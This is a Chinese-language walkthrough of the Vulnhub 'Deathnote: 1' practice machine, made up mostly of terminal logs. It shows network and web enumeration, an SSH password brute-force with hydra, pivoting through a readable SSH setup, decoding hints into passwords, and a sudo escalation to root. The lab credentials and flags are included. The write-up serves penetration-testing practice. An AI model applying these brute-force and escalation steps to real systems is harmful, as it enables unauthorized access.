Vulnhub之Deathnote 靶机详细测试过程




名称:Deathnote: 1



└─$ sudo netdiscover -i eth1 -r
Currently scanning:   |   Screen View: Unique Hosts                                                        
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                            
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------    0a:00:27:00:00:0a      1      60  Unknown vendor                                                     08:00:27:a6:91:71      1      60  PCS Systemtechnik GmbH                                             08:00:27:6a:7a:fa      1      60  PCS Systemtechnik GmbH                                                   

利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.205


└─$ sudo nmap -sS -sV -sC -p- -oN nmap_full_scan
Starting Nmap 7.93 ( ) at 2023-01-16 08:09 EST
Nmap scan report for
Host is up (0.00016s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5eb8ff2dacc7e93c992f3bfcda5ca353 (RSA)
|   256 a8f3819d0adc169a49eebc24e4655ca6 (ECDSA)
|_  256 4f20c32d19755be81f320175c2709a7e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:6A:7A:FA (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nmap done: 1 IP address (1 host up) scanned in 16.03 seconds




└─$ sudo vim /etc/hosts                                        
└─$ cat /etc/hosts       localhost       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters  deathnote.vuln

刷新页面,有个链接:HINT,Find a notes.txt file on server

└─$ nikto -h http://deathnote.vuln/  
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:    deathnote.vuln
+ Target Port:        80
+ Start Time:         2023-01-16 08:44:10 (GMT-5)
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /, inode: c5, size: 5cb285991624e, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7785 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2023-01-16 08:44:57 (GMT-5) (47 seconds)
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to
└─$ nikto -h http://deathnote.vuln/wordpress/
- Nikto v2.1.6
+ Target IP:
+ Target Hostname:    deathnote.vuln
+ Target Port:        80
+ Start Time:         2023-01-16 08:45:08 (GMT-5)
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: <http://deathnote.vuln/wordpress/index.php/wp-json/>; rel=""
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header 'x-redirect-by' found, with contents: WordPress
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST 
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /wordpress/license.txt: License file found may identify site software.
+ /wordpress/: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ OSVDB-3268: /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information
+ /wordpress/wp-login.php: Wordpress login found
+ 7785 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time:           2023-01-16 08:45:57 (GMT-5) (49 seconds)
      Portions of the server's headers (Apache/2.4.38) are not in
      the Nikto 2.1.6 database or are newer than the known string. Would you like
      to submit this information (*no server specific data*) to
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://deathnote.vuln/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
2023/01/16 08:46:25 Starting gobuster in directory enumeration mode
/wordpress            (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
/manual               (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/server-status        (Status: 403) [Size: 279]
Progress: 216128 / 220561 (97.99%)===============================================================
2023/01/16 08:46:47 Finished
└─$ gobuster dir -u http://deathnote.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://deathnote.vuln/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,sh,html
[+] Timeout:                 10s
2023/01/16 08:47:02 Starting gobuster in directory enumeration mode
/.php                 (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 197]
/.html                (Status: 403) [Size: 279]
/wordpress            (Status: 301) [Size: 320] [--> http://deathnote.vuln/wordpress/]
/manual               (Status: 301) [Size: 317] [--> http://deathnote.vuln/manual/]
/robots.txt           (Status: 200) [Size: 68]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/server-status        (Status: 403) [Size: 279]
Progress: 1101050 / 1102805 (99.84%)===============================================================
2023/01/16 08:48:59 Finished
└─$ gobuster dir -u http://deathnote.vuln/wordpress/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.sh,.html
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
[+] Url:                     http://deathnote.vuln/wordpress/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              php,txt,sh,html
[+] Timeout:                 10s
2023/01/16 08:49:11 Starting gobuster in directory enumeration mode
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.php            (Status: 301) [Size: 0] [--> http://deathnote.vuln/wordpress/]
/wp-content           (Status: 301) [Size: 331] [--> http://deathnote.vuln/wordpress/wp-content/]
/wp-login.php         (Status: 200) [Size: 6799]
/license.txt          (Status: 200) [Size: 19915]
/wp-includes          (Status: 301) [Size: 332] [--> http://deathnote.vuln/wordpress/wp-includes/]
/readme.html          (Status: 200) [Size: 7346]
/wp-trackback.php     (Status: 200) [Size: 135]
/wp-admin             (Status: 301) [Size: 329] [--> http://deathnote.vuln/wordpress/wp-admin/]
/xmlrpc.php           (Status: 405) [Size: 42]
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/wp-signup.php        (Status: 302) [Size: 0] [--> http://deathnote.vuln/wordpress/wp-login.php?action=register]
Progress: 1100068 / 1102805 (99.75%)===============================================================
2023/01/16 08:51:15 Finished

└─$ wpscan --url http://deathnote.vuln/wordpress -e u,p                                         
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic -
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]
[+] URL: http://deathnote.vuln/wordpress/ []
[+] Started: Mon Jan 16 08:52:43 2023

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.38 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://deathnote.vuln/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  -
 |  -
 |  -
 |  -
 |  -

[+] WordPress readme found: http://deathnote.vuln/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://deathnote.vuln/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://deathnote.vuln/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  -
 |  -

[+] WordPress version 5.8 identified (Insecure, released on 2021-07-20).
 | Found By: Rss Generator (Passive Detection)
 |  - http://deathnote.vuln/wordpress/index.php/feed/, <generator></generator>
 |  - http://deathnote.vuln/wordpress/index.php/comments/feed/, <generator></generator>

[+] WordPress theme in use: twentytwentyone
 | Location: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/
 | Last Updated: 2022-11-02T00:00:00.000Z
 | Readme: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/readme.txt
 | [!] The version is out of date, the latest version is 1.7
 | Style URL: http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3
 | Style Name: Twenty Twenty-One
 | Style URI:
 | Description: Twenty Twenty-One is a blank canvas for your ideas and it makes the block editor your best brush. Wi...
 | Author: the WordPress team
 | Author URI:
 | Found By: Css Style In Homepage (Passive Detection)
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://deathnote.vuln/wordpress/wp-content/themes/twentytwentyone/style.css?ver=1.3, Match: 'Version: 1.3'

[+] Enumerating Most Popular Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===============================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] kira
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://deathnote.vuln/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at

[+] Finished: Mon Jan 16 08:52:46 2023
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 14.702 KB
[+] Data Received: 444.821 KB
[+] Memory used: 234.879 MB
[+] Elapsed time: 00:00:03
└─$ wpscan --url http://deathnote.vuln/wordpress -U kira -P /usr/share/wordlists/rockyou.txt 



└─$ curl http://deathnote.vuln/robots.txt         
fuck it my dad 
added hint on /important.jpg

ryuk please delete it
└─$ wget http://deathnote.vuln/important.jpg                              
--2023-01-16 09:13:29--  http://deathnote.vuln/important.jpg
Resolving deathnote.vuln (deathnote.vuln)...
Connecting to deathnote.vuln (deathnote.vuln)||:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 277 [image/jpeg]
Saving to: ‘important.jpg’

important.jpg                   100%[====================================================>]     277  --.-KB/s    in 0s      

2023-01-16 09:13:29 (78.8 MB/s) - ‘important.jpg’ saved [277/277]

└─$ ls -alh
total 16K
drwxr-xr-x  2 kali kali 4.0K Jan 16 09:13 .
drwxr-xr-x 24 kali kali 4.0K Jan 16 08:07 ..
-rw-r--r--  1 kali kali  277 Aug 29  2021 important.jpg
-rw-r--r--  1 root root  939 Jan 16 08:09 nmap_full_scan
└─$ steghide extract -sf important.jpg 
Enter passphrase: 
└─$ stegseek important.jpg            
StegSeek 0.6 -

[!] error: the file format of the file "important.jpg" is not supported.
└─$ binwalk -e important.jpg 


└─$ ls     
important.jpg  nmap_full_scan
└─$ file important.jpg                           
important.jpg: ASCII text
└─$ cat important.jpg                    
i am Soichiro Yagami, light's father
i have a doubt if L is true about the assumption that light is kira

i can only help you by giving something important

login username : user.txt
i don't know the password.
find it by yourself 
but i think it is in the hint section of site


密码在Hint区域,那应该就是:## iamjustic3





└─$ hydra -l kira -P dict ssh:// 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2023-01-16 09:22:30
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://
1 of 1 target completed, 0 valid password found
Hydra ( finished at 2023-01-16 09:22:39
└─$ hydra -l L -P dict ssh://
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2023-01-16 09:22:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://
1 of 1 target completed, 0 valid password found
Hydra ( finished at 2023-01-16 09:22:58
└─$ hydra -l l -P dict ssh://
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra ( starting at 2023-01-16 09:23:04
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 44 login tries (l:1/p:44), ~3 tries per task
[DATA] attacking ssh://
[22][ssh] host:   login: l   password: death4me
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra ( finished at 2023-01-16 09:23:12

└─$ ssh l@                                           
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:Pj7G++7sat/zpoeFTsy5FUba1luVvaIo7NG0PdXzxY8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.
l@'s password: 
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:12:29 2021 from
l@deathnote:~$ id
uid=1000(l) gid=1000(l) groups=1000(l),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)
l@deathnote:~$ sudo -l
[sudo] password for l: 
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$ ls -alh
total 36K
drwxr-xr-x 4 l    l    4.0K Sep  4  2021 .
drwxr-xr-x 4 root root 4.0K Jul 19  2021 ..
-rw------- 1 l    l       3 Sep  4  2021 .bash_history
-rw-r--r-- 1 l    l     220 Jul 19  2021 .bash_logout
-rw-r--r-- 1 l    l    3.5K Jul 19  2021 .bashrc
drwxr-xr-x 3 l    l    4.0K Jul 19  2021 .local
-rw-r--r-- 1 l    l     807 Jul 19  2021 .profile
drwx------ 2 l    l    4.0K Sep  4  2021 .ssh
-rw-r--r-- 1 root root  512 Jul 19  2021 user.txt
l@deathnote:~$ cat user.txt


i think u got the shell , but you wont be able to kill me -kira
l@deathnote:/home/kira$ cd .ssh
l@deathnote:/home/kira/.ssh$ ls -alh
total 12K
drwxr-xr-x 2 kira kira 4.0K Jul 19  2021 .
drwxr-xr-x 4 kira kira 4.0K Sep  4  2021 ..
-rw-r--r-- 1 kira kira  393 Jul 19  2021 authorized_keys
l@deathnote:/home/kira/.ssh$ cat authorized_keys 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDyiW87OWKrV0KW13eKWJir58hT8IbC6Z61SZNh4Yzm9XlfTcCytDH56uhDOqtMR6jVzs9qCSXGQFLhc6IMPF69YMiK9yTU5ahT8LmfO0ObqSfSAGHaS0i5A73pxlqUTHHrzhB3/Jy93n0NfPqOX7HGkLBasYR0v/IreR74iiBI0JseDxyrZCLcl6h9V0WiU0mjbPNBGOffz41CJN78y2YXBuUliOAj/6vBi+wMyFF3jQhP4Su72ssLH1n/E2HBimD0F75mi6LE9SNuI6NivbJUWZFrfbQhN2FSsIHnuoLIJQfuFZsQtJsBQ9d3yvTD2k/POyhURC6MW0V/aQICFZ6z l@deathnote
l@deathnote:/home/kira/.ssh$ ssh kira@
Linux deathnote 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Sep  4 06:00:09 2021 from

kira@deathnote:~$ cat kira.txt 

└─$ echo 'cGxlYXNlIHByb3RlY3Qgb25lIG9mIHRoZSBmb2xsb3dpbmcgCjEuIEwgKC9vcHQpCjIuIE1pc2EgKC92YXIp' | base64 -d
please protect one of the following 
1. L (/opt)
2. Misa (/var)
kira@deathnote:~$ cd /opt
kira@deathnote:/opt$ ls -alh
total 12K
drwxr-xr-x  3 root root 4.0K Aug 29  2021 .
drwxr-xr-x 18 root root 4.0K Jul 19  2021 ..
drwxr-xr-x  4 root root 4.0K Aug 29  2021 L
kira@deathnote:/opt$ cd L
kira@deathnote:/opt/L$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29  2021 .
drwxr-xr-x 3 root root 4.0K Aug 29  2021 ..
drwxr-xr-x 2 root root 4.0K Aug 29  2021 fake-notebook-rule
drwxr-xr-x 2 root root 4.0K Aug 29  2021 kira-case
kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -alh
total 16K
drwxr-xr-x 2 root root 4.0K Aug 29  2021 .
drwxr-xr-x 4 root root 4.0K Aug 29  2021 ..
-rw-r--r-- 1 root root   84 Aug 29  2021 case.wav
-rw-r--r-- 1 root root   15 Aug 29  2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$ cat hint
use cyberchef

kira@deathnote:/opt/L/fake-notebook-rule$ cat case.wav
63 47 46 7a 63 33 64 6b 49 44 6f 67 61 32 6c 79 59 57 6c 7a 5a 58 5a 70 62 43 41 3d
kira@deathnote:/opt/L/fake-notebook-rule$ cd ..
kira@deathnote:/opt/L$ ls -alh
total 16K
drwxr-xr-x 4 root root 4.0K Aug 29  2021 .
drwxr-xr-x 3 root root 4.0K Aug 29  2021 ..
drwxr-xr-x 2 root root 4.0K Aug 29  2021 fake-notebook-rule
drwxr-xr-x 2 root root 4.0K Aug 29  2021 kira-case
kira@deathnote:/opt/L$ cd kira-case/
kira@deathnote:/opt/L/kira-case$ ls -alh
total 12K
drwxr-xr-x 2 root root 4.0K Aug 29  2021 .
drwxr-xr-x 4 root root 4.0K Aug 29  2021 ..
-rw-r--r-- 1 root root  295 Aug 29  2021 case-file.txt
kira@deathnote:/opt/L/kira-case$ cat case-file.txt 
the FBI agent died on December 27, 2006

1 week after the investigation of the task-force member/head.
Soichiro Yagami's family .

and according to watari ,
he died as other died after Kira targeted them .

and we also found something in 
fake-notebook-rule folder .

根据提示用cyberchef解码得到:passwd : kiraisevil


kira@deathnote:/opt/L/kira-case$ sudo -l
[sudo] password for kira: 
Matching Defaults entries for kira on deathnote:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kira may run the following commands on deathnote:
    (ALL : ALL) ALL
kira@deathnote:/opt/L/kira-case$ sudo /bin/bash
root@deathnote:/opt/L/kira-case# cd /root
root@deathnote:~# ls -alh
total 32K
drwx------  3 root root 4.0K Sep  4  2021 .
drwxr-xr-x 18 root root 4.0K Jul 19  2021 ..
-rw-------  1 root root   35 Sep  4  2021 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root 4.0K Jul 19  2021 .local
-rw-------  1 root root  190 Jul 19  2021 .mysql_history
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root  957 Jul 19  2021 root.txt
root@deathnote:~# cat root.txt

      ::::::::       ::::::::       ::::    :::       ::::::::       :::::::::           :::    :::::::::::       :::::::: 
    :+:    :+:     :+:    :+:      :+:+:   :+:      :+:    :+:      :+:    :+:        :+: :+:      :+:          :+:    :+: 
   +:+            +:+    +:+      :+:+:+  +:+      +:+             +:+    +:+       +:+   +:+     +:+          +:+         
  +#+            +#+    +:+      +#+ +:+ +#+      :#:             +#++:++#:       +#++:++#++:    +#+          +#++:++#++   
 +#+            +#+    +#+      +#+  +#+#+#      +#+   +#+#      +#+    +#+      +#+     +#+    +#+                 +#+    
#+#    #+#     #+#    #+#      #+#   #+#+#      #+#    #+#      #+#    #+#      #+#     #+#    #+#          #+#    #+#     
########       ########       ###    ####       ########       ###    ###      ###     ###    ###           ########       

##########follow me on twitter###########3
and share this screen shot and tag @KDSAMF



  1. 本靶机应该是一路有提示的,但是在访问/robots.txt文件的时候返回不存在,此时应该尝试curl等命令行方法
